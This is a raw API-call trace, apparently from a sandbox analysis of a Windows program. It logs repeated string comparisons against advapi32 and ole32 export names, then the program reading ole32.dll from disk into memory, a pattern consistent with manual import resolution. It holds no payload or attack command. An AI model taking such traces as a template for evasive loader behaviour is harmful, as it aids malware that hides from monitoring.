lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0289.546] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0289.547] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0289.548] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.549] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0289.549] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0289.551] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0289.552] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0289.553] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0289.554] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0289.555] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0289.555] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0289.555] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0289.923] GetProcessHeap () returned 0x5d0000 [0289.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2c42010 | out: hHeap=0x5d0000) returned 1 [0289.930] GetProcessHeap () returned 0x5d0000 [0289.930] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e9320 [0289.931] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0289.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.933] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0289.933] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0289.933] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.934] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0289.934] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0289.934] GetProcessHeap () returned 0x5d0000 [0289.934] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x142d00) returned 0x400e040 [0289.938] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.938] ReadFile (in: hFile=0x140, lpBuffer=0x400e040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x400e040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0290.059] CloseHandle (hObject=0x140) returned 1 [0290.060] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0290.060] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0290.060] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.061] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.061] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.062] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0290.063] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0290.063] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0290.064] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 